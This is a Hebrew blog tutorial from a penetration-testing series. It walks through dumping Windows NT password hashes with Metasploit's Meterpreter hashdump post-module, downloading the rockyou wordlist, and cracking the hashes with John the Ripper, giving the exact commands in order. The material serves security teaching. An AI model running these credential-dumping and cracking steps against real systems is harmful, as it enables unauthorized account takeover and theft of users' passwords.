Home אבטחת מידעPenetration Testing - Offense הוצאת Hash Dump ע”י Meterpreter ופיצוח הסיסמא ע”י John the Ripper

הוצאת Hash Dump ע”י Meterpreter ופיצוח הסיסמא ע”י John the Ripper

by Tal Ben Shushan 27/01/2018 0 comment
הוצאת Hash Dump ע”י Meterpreter ופיצוח הסיסמא ע”י John the Ripper

כל הזכויות שמורות לטל בן שושן – Shushan.co.il

הוצאת Hash Dump ע”י Meterpreter ופיצוח הסיסמא ע”י John the Ripper


על מנת לבצע את המאמר, יש לעבור תחילה על המאמרים הבאים:
Kali & Metasploit

התקנת Kali 2017.3
הגדרה ראשונית של Kali והוספת Repository
הסבר הגדרה והפעלת Metasploit
פקודות ושימוש ב Metasploit


John the Ripper – מאפשר לנו לנסות לפצח סיסמאות לפי פורמטים, במקרה שלנו הסיסמאות שנקבל הם מסוג NT Hash

המדריך דורש:

  • KALI
  • ביצוע התחברות ל Meterpreter

נלחץ על Ctrl +Z על מנת להכניס את ה Session של ה Meterpreter  לרקע

Meterpreter >

כעת הוא יחזור ל

msf exploit >

נשתמש בפקודה

msf exploit > use post/windows/gather/hashdump

נגדיר לו שה Session שלנו הוא מספר 1 (אם לא, בדקו על ידי session -l)

msf post(hashdump) > set session 1

רשמו run

msf post(hashdump) > run

כעת נוריד מהאינטרנט קובץ המכיל סיסמאות ובכך יוכל הJohnTheRipper לפצח את הסיסמא, נפתח את הטרמינל בקאלי

root@kali:~# wget http://scrapmaker.com/data/wordlists/dictionaries/rockyou.txt

כעת נעתיק את התוצאה של HashDump ל Leafpad ונשמור אותו ב Root (מוסבר בשורה למטה)

/root/

בשם

password.txt

נבדוק שהוא יושב בנתיב /root/ ונקיש את הפקודה

root@kali:~#john --wordlist=/root/rockyou.txt --format=NT /root/password.txt

לחצו Enter

מעולה, הוא הצליח להשיג את הסיסמא

מאמרים קשורים

Leave a Comment